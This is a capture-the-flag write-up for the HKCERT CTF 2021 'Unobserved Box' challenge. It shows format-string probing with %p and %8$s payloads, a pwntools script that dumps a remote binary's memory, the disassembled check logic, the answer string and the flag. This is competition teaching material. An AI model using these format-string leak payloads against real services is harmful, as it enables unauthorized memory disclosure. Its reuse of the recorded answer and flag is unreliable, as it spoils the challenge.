Unobserved Box (250 pts, 6 solves)
Team Name: O0027 - UND3r 20 D53 H473r5 4ND r374K3r
Solved by: grhkm and Kaiziron
Source of the problem: HKCERT CTF 2021
Problem Statement
All codes are uncertain before the measurement, and you will never make it.
Observe the code to get the flag.
nc chalp.hkcert21.pwnable.hk 28132
Solution Outline
We dump the binary from 0x400000 to 0x405000 using a format string vulnerability and %8$s, then reverse engineer the check function for the flag.
Initial Discoveries
Let’s have a look at the server:
❯ nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAA
AAAAAAAA is not the correct answer.
❯ python3 -c "print('A' * 200)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.
❯ python3 -c "print('A' * 2000)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.
❯ python3 -c "print('%p|' * 25)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffe0708a40|0x7fffe0708a40|(nil)|0x7fcf5ced7d80|0x7fcf5ced7d80|0x70257c70257c7025|0x257c70257c70257c|0x7c70257c70257c70|0x257c70257c7025|0x401490| is not the correct answer.
Woah, we just found a format string vulnerability!
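The leaked words are worth decoding before moving on. x86-64 is little-endian, so re-encoding each 8-byte value in little-endian order gives the bytes as they sit on the stack. The sketch below uses values 6 to 9 copied from the output above; the helper name `word_to_bytes` is ours and purely illustrative.

```python
# Values 6 to 9 of the %p leak above, copied verbatim from the server output.
leaked = [
    0x70257C70257C7025,
    0x257C70257C70257C,
    0x7C70257C70257C70,
    0x257C70257C7025,
]


def word_to_bytes(word: int) -> bytes:
    """Hypothetical helper: re-encode a leaked 64-bit word as it lies in memory."""
    return word.to_bytes(8, "little")


stack_bytes = b"".join(word_to_bytes(w) for w in leaked)
print(stack_bytes)
```

The result is our own `%p|%p|...` input followed by a null byte, which suggests that the input buffer starts at argument 6 and that the server keeps only the first 31 bytes of each line.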
Dumping Binary
With the format string vulnerability, let’s tweak it to point to our input:
❯ python3 -c "print('%p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7ffc5c5ede60|AAAAAAAAAAAAAAAAAAAA is not the correct answer.
❯ python3 -c "print('%1\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffebbd6ef0|AAAAAAAAAAAAAAAAAAAA is not the correct answer.
...
❯ python3 -c "print('%8\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x4141414141414141|AAAAAAAAAAAAAAAAAAAA is not the correct answer.
So now that our format string %8$p points to the input, how about we write an address into it? More importantly, we know that 64-bit non-PIE binaries are usually mapped at 0x400000 (the 0x401490 value leaked earlier falls in that range), so we can explore that:
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJKLMNOPQRST')" | nc chalp.hkcert21.pwnable.hk 28132
0x535251504f4e4d4c|ABCDEFGHIJKLMNOPQRST is not the correct answer.
# 0x53 -> S, 0x4c -> L
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK________')" | nc chalp.hkcert21.pwnable.hk 28132
0x5f5f5f5f5f5f5f5f|ABCDEFGHIJK________ is not the correct answer.
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
0x400000|ABCDEFGHIJK is not the correct answer.
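The layout used in these commands can be written down as a small sketch. It assumes, based on the earlier %p leak, that argument 6 is the start of the input buffer and that each argument is 8 bytes wide, so the address has to sit at an 8-byte aligned offset. The names `arg_index` and `build_payload` are hypothetical, and the pad here uses 'A' bytes instead of 'ABCDEFGHIJK'.

```python
import struct

FIRST_BUFFER_ARG = 6  # assumption from the %p leak: argument 6 is buffer offset 0
WORD = 8              # each printf argument slot is 8 bytes on x86-64


def arg_index(offset: int) -> int:
    """Map a buffer offset to the positional argument number that reads it."""
    if offset % WORD != 0:
        raise ValueError("the address must start on an 8-byte boundary")
    return FIRST_BUFFER_ARG + offset // WORD


def build_payload(addr: int, conv: bytes = b"s", offset: int = 16) -> bytes:
    """Build [format spec]|[padding][little-endian address]."""
    spec = b"%" + str(arg_index(offset)).encode() + b"$" + conv + b"|"
    pad = b"A" * (offset - len(spec))  # fill up to the aligned offset
    return spec + pad + struct.pack("<Q", addr)


print(build_payload(0x400000))
```

With offset 16 the directive becomes %8$s, the padding is 11 bytes, and the whole payload is 24 bytes, which fits within the 31 bytes the server appears to keep.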
Great, now note that the %s format outputs the string stored at the given address. So, for example, if we replace %8$p with %8$s in the last command above, we get:
# the magic header has appeared
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
ELF|ABCDEFGHIJK is not the correct answer.
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | hexdump -C
00000000 7f 45 4c 46 02 01 01 7c 41 42 43 44 45 46 47 48 |.ELF...|ABCDEFGH|
00000010 49 4a 4b 20 69 73 20 6e 6f 74 20 74 68 65 20 63 |IJK is not the c|
00000020 6f 72 72 65 63 74 20 61 6e 73 77 65 72 2e 0a |orrect answer..|
0000002f
# remember - 64-bit systems!
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | python3 -c "print(input().split('|')[0], end='')" | hexdump -C
00000000 7f 45 4c 46 02 01 01 |.ELF...|
00000007
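Hurray! Since strings are terminated by null bytes, we also know that the byte right after the output is a null byte, so we can continue at the address after it and repeat.
(Note: if there is no output at all, which is the case for address 0x400008, the byte at that address is itself a null byte, so we record one null byte and move on to the next address.)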
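The stitching logic can be tried offline first. The sketch below replaces the remote service with a hypothetical `fake_leak` that behaves like a %s read on a local byte string; the sample `memory` is made up apart from its first seven bytes, which match the header seen above.

```python
def fake_leak(memory: bytes, base: int, addr: int) -> bytes:
    """Stand-in for the remote %s read: bytes from addr up to the next null byte."""
    start = addr - base
    end = memory.index(b"\x00", start)
    return memory[start:end]


def stitch(memory: bytes, base: int) -> bytes:
    """Rebuild memory from null-terminated chunks, one leak per chunk."""
    out = bytearray()
    addr = base
    while addr < base + len(memory):
        # An empty leak means the byte at addr is itself a null byte.
        chunk = fake_leak(memory, base, addr) + b"\x00"
        out += chunk
        addr += len(chunk)
    return bytes(out)


# Made-up sample; it must end with a null byte so that every leak terminates.
memory = b"\x7fELF\x02\x01\x01\x00\x00\x00AB\x00C\x00"
print(stitch(memory, 0x400000) == memory)
```

Each leak recovers one chunk plus its terminator, so a run of null bytes costs one connection per byte.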
There are a few other issues to address. An important one is when the address contains \x0a, more commonly known as \n: the payload then has a newline in the middle, and the server skips the part afterwards. I simply skip those addresses and record a null byte in their place, which shouldn’t cause too much of a problem.
Now let’s put this all into one python script:
from pwn import *

context.log_level = 'WARNING'
conn = None
host, port = 'chalp.hkcert21.pwnable.hk', 28132
start, end = 0x400000, 0x405000  # range from the solution outline

def init():
    # Open a fresh connection for every leak, closing the previous one
    global conn
    if conn is not None:
        conn.close()
    conn = remote(host, port)

def dump(addr):
    # Turn 0x400102 into b'\x02\x01\x40\x00\x00\x00\x00\x00'
    bddr = p64(addr)
    # Handling special case: '\n'
    if b'\n' in bddr:
        return b''
    # Then construct payload: [fs]|[pad][bddr]
    fs = b'%8$s'
    pad = b'ABCDEFGHIJK'
    payload = fs + b'|' + pad + bddr
    # send it!
    init()
    conn.send(payload + b'\n')
    # Stop at '|' + pad rather than at '|' alone, so a 0x7c byte
    # inside the leaked data does not cut the chunk short
    response = conn.recvuntil(b'|' + pad, drop=True)
    print(f'[*] {hex(addr)} => {response}')
    return response

addr = start
# append, bytes
with open('dump', 'ab') as fout:
    while addr < end:
        # ends at null byte
        res = dump(addr) + b'\0'
        addr += len(res)
        fout.write(res)
        fout.flush()
The next step is to let the code run zzz…
You can download the binary I got.
Reverse Engineering
Once we have a sufficient amount of the binary, we can open it in IDA or other tools. Looking around, we find what seems to be the check function:
Each block is relatively simple, and we can go through them one by one. Just a trick in general - not everything has to be carefully checked and rigorous. Looking through the code and cracking it took us one minute - guesswork and hand-waving are key!
push rbp
mov rbp, rsp
sub rsp, 10h
mov [rbp+var_8], rdi
mov rax, [rbp+var_8] # [rbp+var_8] is our input string (s)
mov rdi, rax
call sub_401060 # some libc function with a string parameter - strlen!
cmp rax, 13h # [1] len(s) == 19 (0x13)
jz short loc_4011BA
mov rax, [rbp+var_8]
add rax, 6 # s[6]
movzx eax, byte ptr [rax]
cmp al, 5Fh # [2] s[6] == '_' (0x5f)
jnz short loc_4011E3
mov rax, [rbp+var_8]
add rax, 9
movzx edx, byte ptr [rax] # edx = s[9]
mov rax, [rbp+var_8]
add rax, 6
movzx eax, byte ptr [rax] # eax = s[6]
cmp dl, al # [3] s[6] == s[9]
jz short loc_4011ED
mov rax, [rbp+var_8]
mov edx, 6
lea rsi, aPrintf_0 ; "printf" # aww IDA is so nice
mov rdi, rax
call sub_401040 # some libc function with two string parameters (one is constant) and a length in edx
test eax, eax # probably strncmp with n = 6
jz short loc_401213 # [4] s[:6] == "printf"
mov rax, [rbp+var_8]
add rax, 0Ah # start at s[10]
mov edx, 6
lea rsi, aDanger ; "danger"
mov rdi, rax
call sub_401040
test eax, eax # [5] s[10:16] == "danger"
jz short loc_40123D
mov rax, [rbp+var_8]
add rax, 12h
movzx eax, byte ptr [rax]
cmp al, 73h # [6] s[18] == 's'
jz short loc_401253
mov rax, [rbp+var_8]
add rax, 11h
movzx eax, byte ptr [rax]
cmp al, 75h # [7] s[17] == 'u'
jz short loc_401269
mov rax, [rbp+var_8]
add rax, 10h
movzx eax, byte ptr [rax]
cmp al, 6Fh # [8] s[16] == 'o'
jz short loc_40127F
mov rax, [rbp+var_8]
add rax, 2
movzx edx, byte ptr [rax]
mov rax, [rbp+var_8]
add rax, 7
movzx eax, byte ptr [rax]
cmp dl, al # [9] s[2] == s[7]
jz short loc_4012A0
mov rax, [rbp+var_8]
add rax, 8
movzx edx, byte ptr [rax]
mov rax, [rbp+var_8]
add rax, 12h
movzx eax, byte ptr [rax]
cmp dl, al # [10] s[8] == s[18]
jz short loc_4012C1
Putting them together, we have:
len(s) == 19
s[6] == '_'
s[6] == s[9]
s[:6] == "printf"
s[10:16] == "danger"
s[18] == 's'
s[17] == 'u'
s[16] == 'o'
s[2] == s[7]
s[8] == s[18]
No, don’t start writing a z3 solver script yet. Get your pen and paper and try it out!
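For reference, the pen-and-paper work amounts to filling in 19 slots in the right order. Here is a small sketch that replays the ten conditions as plain assignments, with the bracketed numbers referring to the annotations in the disassembly above; nothing in it talks to the server.

```python
s = [None] * 19                       # [1] len(s) == 19
s[0:6] = "printf"                     # [4] s[:6] == "printf"
s[6] = "_"                            # [2] s[6] == '_'
s[9] = s[6]                           # [3] s[6] == s[9]
s[10:16] = "danger"                   # [5] s[10:16] == "danger"
s[16], s[17], s[18] = "o", "u", "s"   # [8], [7], [6]
s[7] = s[2]                           # [9] s[2] == s[7]
s[8] = s[18]                          # [10] s[8] == s[18]

# Every slot is now determined, so the conditions admit exactly one string.
assert None not in s
answer = "".join(s)
print(answer)
```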
Finally, we get that s == printf_is_dangerous. Supplying it to the remote server gives:
❯ echo printf_is_dangerous | nc chalp.hkcert21.pwnable.hk 28132
hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}
Flag: hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}
Remarks
If this is your first time seeing a blind format string challenge, here are some good writeups from previous challenges:
- 33C3CTF ESPR by LiveOverflow
- HITB-XCTF GSEC 2018 by David Buchanan